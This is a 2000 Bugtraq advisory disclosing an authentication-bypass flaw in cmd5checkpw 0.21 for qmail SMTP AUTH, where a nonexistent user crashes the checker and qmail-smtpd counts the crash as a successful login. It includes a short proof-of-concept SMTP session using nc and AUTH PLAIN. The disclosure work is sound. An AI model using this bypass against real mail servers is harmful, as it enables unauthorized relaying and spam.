[17239] in bugtraq
Authentication failure in cmd5checkpw 0.21
daemon@ATHENA.MIT.EDU (Javier Kohen)
Tue Oct 17 00:49:01 2000
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="7JfCtLOvnd9MIVvH"
Content-Disposition: inline
Message-ID: <20001016231821.A1812@jkohen.tough.com.ar>
Date: Mon, 16 Oct 2000 23:18:21 -0300
Reply-To: Javier Kohen <jkohen@TOUGH.COM>
From: Javier Kohen <jkohen@TOUGH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--7JfCtLOvnd9MIVvH
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Program: cmd5checkpw
Vulnerable versions: 0.21 (probably earlier, too.)
Fixed versions: 0.22
URI: http://freshmeat.net/projects/cmd5checkpw/
Author: Elysium deeZine <http://www.elysium.pl/>
Description:
This program works as an authentication plug-in for a patch of the same aut=
hor to add SMTP AUTH support to QMail. I found that if it was fed with a no=
n-existing user name, it would segfault due to the lack of checking for the=
(imprabable?) reason of such an invalid input. The exploit here comes from=
the consecuence of this problem; the caller -in this case the patched qmai=
l-smtpd - would take its child crashing as a successful authentication, thu=
s validating the session. This brings an open door for spam.
Even though this utility was fixed, the vulnerability in the patch to qmail=
-smtpd still remains, leaving the door opened to further bugs in the authen=
tication plug-ins.
Proof of concept:
$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=3DLOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok.
--=20
Javier Kohen <jkohen@tough.com>
ICQ #2361802 [blashyrkh]
http://www.tough.com.ar/
--7JfCtLOvnd9MIVvH
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.3 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE567btc7v1iJ0e7rERAuqLAJ4sdSLm7VEENPD3tEzc2oPvcX0KhwCfQqM1
KxhvfofJ6YabWLXy/s4Gx/s=
=kcGD
-----END PGP SIGNATURE-----
--7JfCtLOvnd9MIVvH--
